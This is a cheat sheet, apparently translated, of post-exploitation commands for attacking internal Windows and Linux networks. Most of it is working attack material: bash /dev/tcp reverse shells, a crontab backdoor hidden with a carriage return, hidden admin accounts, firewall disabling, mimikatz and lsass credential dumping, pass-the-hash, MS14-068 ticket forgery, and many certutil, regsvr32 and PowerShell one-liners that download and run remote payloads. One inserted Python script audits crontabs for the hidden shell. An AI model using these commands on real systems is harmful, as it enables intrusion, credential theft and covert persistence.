Internal Network Collection
Internal Network Information Gathering
In the cybersecurity industry, and in computing generally, daily work involves the command-line interface (CLI). Compared with the familiar graphical interface (GUI), the command line is faster and more efficient. Here is a collection of some of the relevant commands.
Windows cmd & PowerShell
query user || qwinsta - view currently logged-on users
net user - view local users
net user /domain - view domain users
net view & net group "domain computers" /domain - list the computers in the current domain (the second command returns more)
net view /domain - view how many domains there are
net view \\dc - view shared files on the DC
net group /domain - view the groups in the domain
net group "domain admins" /domain - view domain admins
net localgroup administrators /domain - also lists domain admins; when a machine is promoted to a domain controller, its local Administrators become domain admins
net group "domain controllers" /domain - domain controllers
net time /domain
net config workstation - current logon domain - computer name - user name
net use \\<dc> (e.g. pc.xx.com) password /user:xxx.com\username - equivalent to logging onto a domain host with this account; its resources can then be accessed
ipconfig
systeminfo
tasklist /svc
tasklist /S ip /U domain\username /P /V - view the tasklist of a remote computer
net localgroup administrators && whoami - check whether the current user belongs to the administrators group
netstat -ano
nltest /dclist:xx - view domain controllers
whoami /all - view the Mandatory Label (UAC integrity level) and SID
net session - view remote connection sessions (requires admin rights)
net share - shared directories
cmdkey /l - view saved logon credentials
echo %logonserver% - view the logon server/domain
setspn -L administrator - SPN records
set - environment variables
dsquery server - find AD DC/LDS instances in the directory
dsquery user - find users in the directory
dsquery computer - query all computer names (Windows 2003)
dir /s *.exe - find non-hidden .exe files in the specified directory and its subdirectories
arp -a
Check whether 3389 is open:
netstat -ano
tasklist /svc
Add a user:
net user 123 123 /add
Delete a user:
net user 123 /del
Add to the administrators group:
net localgroup administrators 123 /add
Enable port 3389 via the registry:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Disable port 3389 via the registry:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000001 /f
If Remote Desktop has never been configured on the system, a firewall rule allowing port 3389 must also be added the first time it is enabled:
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
Disable the firewall:
netsh firewall set opmode disable
netsh firewall set opmode mode=disable
Hide a Windows user:
Open a cmd with SYSTEM privileges:
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-TokenManipulation.ps1');Invoke-TokenManipulation -CreateProcess 'cmd.exe' -Username 'nt authority\system'
Add a user and hide it:
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/3gstudent/Windows-User-Clone/master/Windows-User-Clone.ps1')
Account hiding on Windows systems:
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%B8%90%E6%88%B7%E9%9A%90%E8%97%8F/
Windows RDP connection records:
http://rcoil.me/2018/05/%E5%85%B3%E4%BA%8Ewindows%E7%9A%84RDP%E8%BF%9E%E6%8E%A5%E8%AE%B0%E5%BD%95/
Linux bash:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
bash -i - interactive shell
>& - standard error redirected to standard output
/dev/tcp/10.0.0.1/8080 - open a socket to ip:port
0>&1 - standard input redirected to standard output
(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/IP/port;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -
Sneaky version (the carriage return makes crontab -l appear empty):
(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/IP/PORT;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for whoami%100c\n")|crontab -
Detailed write-up:
https://github.com/tom0li/security_circle/blob/master/15288418585142.md
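As an added defender-side example (not code from the original page or the linked write-up), the following Python script audits crontab text for the pattern described above: a /dev/tcp redirection, an interactive bash in a scheduled job, and the carriage-return trick from the sneaky version that hides the entry from crontab -l on a terminal. The sample crontab content is constructed.

```python
import re

# Constructed sample of `crontab -l` output (not from the page). The second
# entry uses "\r" so that, on a terminal, "no crontab for root" overwrites
# the real job and the listing looks empty.
SAMPLE_CRONTAB = (
    "0 3 * * * /usr/local/bin/backup.sh\n"
    "*/60 * * * * exec 9<> /dev/tcp/192.0.2.10/4444;exec 0<&9;exec 1>&9 2>&1;"
    "/bin/bash --noprofile -i;\rno crontab for root" + " " * 100 + "\n"
)

# bash's /dev/tcp and /dev/udp pseudo-devices: /dev/tcp/<host>/<port>
DEV_SOCKET = re.compile(r"/dev/(tcp|udp)/[\w.\-]+/\d+")
# Control characters other than newline and tab; \r (0x0d) is included.
CONTROL_CHAR = re.compile(r"[\x00-\x08\x0b-\x1f\x7f]")
# "bash ... -i": an interactive shell has no business in a cron job.
INTERACTIVE_BASH = re.compile(r"\bbash\b.*\s-i\b")


def audit_crontab(text):
    """Return a list of suspicious crontab entries with the reasons found."""
    findings = []
    for lineno, line in enumerate(text.split("\n"), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        reasons = []
        sock = DEV_SOCKET.search(line)
        if sock:
            reasons.append("network redirection to " + sock.group(0))
        if CONTROL_CHAR.search(line):
            reasons.append("control character hides entry from crontab -l")
        if INTERACTIVE_BASH.search(line):
            reasons.append("interactive shell in scheduled job")
        if reasons:
            # Keep only the real job text, dropping the decoy after "\r".
            findings.append({"line": lineno, "reasons": reasons,
                             "entry": line.split("\r")[0]})
    return findings


if __name__ == "__main__":
    # Replace SAMPLE_CRONTAB with the output of `crontab -l -u <user>` to audit a host.
    for finding in audit_crontab(SAMPLE_CRONTAB):
        print(finding)
```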
MySQL privilege escalation:
sqlmap.py -d mysql://root:password1234@192.168.0.6:3306/information_schema --sql-shell
ew forward proxy:
ew -s ssocksd -l 1080
Reverse proxy:
Attacker machine: ew -s rcsocks -l 1080 -e 2333 - the victim machine connects to port 2333 on this machine, which is forwarded to local port 1080; accessing local port 1080 is then equivalent to reaching the victim through port 2333
Victim machine: ew -s rssocks -d 192.168.1.100 -e 2333
Enable proxychains:
/etc/proxychains.conf
Port forwarding:
Forward port 3389 of the victim machine to port 8888
lcx.exe -slave 139.1.2.3 8888 10.48.128.25 3389
Privilege escalation:
Windows privilege-escalation helper; it works by comparing the patch list from systeminfo against a vulnerability database. Tool link:
https://github.com/GDSSecurity/Windows-Exploit-Suggester/
Linux privilege-escalation helper:
https://github.com/jondonas/linux-exploit-suggester-2
windows-kernel-exploits - collection of Windows privilege-escalation vulnerabilities
https://github.com/SecWiki/windows-kernel-exploits
linux-kernel-exploits - collection of Linux privilege-escalation vulnerabilities
https://github.com/SecWiki/linux-kernel-exploits
Msf
Linux payloads:
linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
linux/x64/shell/bind_tcp
linux/x64/shell/reverse_tcp
linux/x64/shell_bind_tcp
linux/x64/shell_bind_tcp_random_port
linux/x64/shell_reverse_tcp
Windows payloads:
windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/meterpreter/reverse_hop_http
windows/meterpreter/reverse_http
windows/meterpreter/reverse_http_proxy_pstore
windows/meterpreter/reverse_https
windows/meterpreter/reverse_https_proxy
windows/shell_reverse_tcp
windows/shell_bind_tcp
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcp
Reverse shell:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
nc -e cmd.exe ip port
Listener:
windows/meterpreter/reverse_tcp
windows/shell_reverse_tcp
Upload/download in meterpreter:
upload file
download file
Msf process injection:
getuid
getpid
ps
migrate 676
Msf hash dump:
run hashdump - requires SYSTEM privileges
run post/windows/gather/smart_hashdump - requires SYSTEM privileges
search bypassuac
Msf persistent backdoor:
run persistence -h - creates an autorun entry; it writes a registry key and drops a file.
run persistence -U -i 10 -p 10390 -r free.ngrok.cc
Msf powershell:
load powershell
powershell_shell
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');
Invoke-Mimikatz -DumpCreds
Pass-the-hash:
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:system /ntlm:3b1cc1bbc10104cc9ec412fab33581d7" exit
MS17-010:
background
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 172.17.0.0/24
set threads 50
Establish an IPC$ connection (map a drive):
net use i: \\192.168.1.1\c$ pass /u:admin
Open IPC$:
net use \\192.168.1.1\ipc$
Mimikatz:
privilege::debug
sekurlsa::logonpasswords
Mimikatz from registry hives:
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM
lsadump::sam /sam:SAM /system:SYSTEM
mimikatz + procdump to obtain hashes from memory:
procdump.exe -accepteula -ma lsass.exe lsass.dmp (requires admin rights)
Place lsass.dmp in the same directory as mimikatz.exe
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
Dump the current logon credentials:
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
On Windows Server 2012 and some Windows Server 2008 systems, mimikatz cannot dump plaintext passwords by default
Workaround: enable WDigest authentication. cmd:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
powershell:
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
Msf + mimikatz pass-the-hash:
exploit/windows/smb/psexec
set smbuser
set smbpass
set rhost
MS14-068 Kerberos vulnerability exploitation:
Generate a TGT (used for forging):
whoami /all - obtain user@domain, the user's SID and the domain host
python ms14068.py -u admin@xxx.com -p password -s sid -d dc.xxx.com
ms14068.exe -u admin@xxx.com -p password -s sid -d dc.xxx.com
This generates TGT_admin@xxx.com.ccache
Inject the TGT:
klist
klist purge - clear all credentials, wait a moment, then run the following commands
Load into memory:
mimikatz.exe "kerberos::ptc c:\TGT_admin@xxx.com.ccache"
If successful:
dir \\dc.xxx.com\c$
net user admin xxxxx@password /add /domain
net group "Domain Admins" admin /add /domain
Psexec:
Run a program on the remote computer
psexec \\192.168.100.2 -u administrator -p 123456 -d -s calc
Returns after launching calc; a calc process then runs on the remote computer as SYSTEM, because -s (system) precedes calc. The remote user cannot see the window; to make it visible, add the -i parameter
psexec \\192.168.100.2 -u administrator -p 123456 -d calc
As above, but runs calc as the current user, then returns
psexec \\192.168.100.2 -u administrator -p 123456 -i -d cmd /c start http://www.baidu.com
Opens the Baidu web page on the remote machine as the current user and lets the user see it. To run a cmd command on the remote computer without the user seeing the window:
psexec \\192.168.100.2 -u administrator -p 123456 -s cmd
RDP brute force:
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
dpapi::cred /in:C:\Users\dell\AppData\Local\Microsoft\Credentials\3B98DB2BC774365C2C3C6B8490D0BCD1
sekurlsa::dpapi
dpapi::cred /in:C:\Users\administrator\AppData\Local\Microsoft\Credentials\3B98DB2BC774365C2C3C6B8490D0BCD1 /masterkey:6efae56547ada268846aa2c4cb3709a4a541418f382b25de4f4b5736f5b86b6fdc1b92fe28670e34a89c4fbdfa6a8d7a9e6dac289547b4f5b5c6154a144ddbca
Scheduled tasks:
at 22:44 /interactive cmd /c C:\Users\ss\Desktop\beacon.exe
schtasks.exe
schtasks /query /s Reskit16 /fo csv /nh >> svr01data\tasklogs\p0102.csv
Remote download via cmd:
bitsadmin (can only download to a specified path; Windows 7 and later):
①bitsadmin /transfer myDownLoadJob /download /priority normal "http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg" "d:\abc.jpg"
②bitsadmin /transfer d90f http://site.com/a %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe
PowerShell download and execute (Windows 7 and later):
①powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:\test\1.exe');start-process 'C:\test\1.exe'
②cmd.exe /c powershell.exe (new-object System.Net.WebClient).downloadfile('http://172.16.8.6','beacon.exe')
rundll32 download and execute:
①rundll32 \\webdavserver\folder\payload.dll,entrypoint
②rundll32.exe javascript:"..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
.NET regasm download and execute:
①C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
Remote command download via cmd:
cmd.exe /k < \\webdavserver\folder\batchfile.txt
regsvr32 download and execute:
①regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
②regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
③regsvr32 /u /s /i:http://site.com/js.png scrobj.dll
certutil download and execute:
①certutil -urlcache -split -f http://192.168.160.87/beacon.exe
②certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
③certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
④certutil -urlcache -split -f http://site.com/a a.exe && a.exe && del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete
odbcconf download and execute:
①odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
cscript remote download and execute:
①cscript //E:jscript \\webdavserver\folder\payload.txt
View a file's hash:
certutil -hashfile filename MD5
certutil -hashfile filename SHA1
certutil -hashfile filename SHA256
IPC brute force:
search smb_login
set user_file
set pass_file
set rhost
Establish IPC$ and drop a payload
Execute it with an at scheduled task, or use the module psexec_command:
set rhost
set smbuser
set smbpass
set command c:/beacon.exe
PowerShell:
Get SIDs: Get-WmiObject -Class Win32_UserAccount
Get RDP connection history: dir "Registry::HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" -Name
View saved Wi-Fi passwords:
netsh wlan show profile
netsh wlan show profile "PROFILE_NAME" key=clear
reGeorg:
Run locally: python reGeorgSocksProxy.py -p 8080 -u http://www.XXX.com/tunnel.jsp
Local proxy configuration: socks5 127.0.0.1 8888